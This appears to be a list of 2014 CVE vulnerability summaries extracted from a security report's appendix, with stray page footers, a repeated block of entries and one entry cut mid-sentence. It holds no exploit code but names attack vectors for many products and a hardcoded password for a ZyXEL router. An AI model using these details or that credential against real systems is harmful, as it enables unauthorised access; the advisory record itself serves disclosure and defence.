CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed .3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster. Page 23 of 28
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.
